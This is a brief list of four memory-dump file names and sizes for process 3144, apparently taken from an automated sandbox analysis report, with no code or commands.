  memory/3144-115-0x00007FFE82E80000-0x00007FFE82E90000-memory.dmp  (64KB)
  memory/3144-122-0x000001AD1A100000-0x000001AD1A102000-memory.dmp  (8KB)
  memory/3144-116-0x00007FFE82E80000-0x00007FFE82E90000-memory.dmp  (64KB)
  memory/3144-250-0x000001AD293F0000-0x000001AD293F4000-memory.dmp  (16KB)